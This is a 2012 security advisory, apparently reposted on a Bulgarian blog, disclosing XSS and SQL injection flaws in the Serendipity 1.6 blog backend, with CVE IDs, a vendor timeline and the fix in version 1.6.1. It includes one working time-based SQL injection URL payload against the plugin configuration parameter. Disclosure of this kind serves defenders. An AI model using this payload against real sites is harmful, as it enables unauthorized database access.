Advisory:		Serendipity 1.6 Backend Cross-Site Scripting and SQL-Injection vulnerability
Advisory ID:		KORAMIS-ADV2012-001
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Serendipity 1.6
Vendor URL:
Vendor Status:		fixed
CVE-ID:			CVE-2012-2331,CVE-2012-2332

Vulnerability Description:

The Serendipity backend is prone to a Cross-Site Scripting and SQL-Injection vulnerability.

Technical Details:

# Cross Site-Scripting (CVE-2012-2331)

# SQL-Injection (CVE-2012-2332)
http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1' OR SLEEP(10)=0 LIMIT 1--+


Upgrade to version 1.6.1

Disclosure Timeline:

21-Apr-2012 - informed developers
22-Apr-2012 - feedback from developer
08-May-2012 - fixed in version 1.6.1


Vulnerabilities found and advisory written by Stefan Schurtz (KORAMIS Security Team).

Rate this post
Брой прочитания на тази страница: 937
Serendipity 1.6 Backend XSS And SQLi Vulnerability
Tagged on:     

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *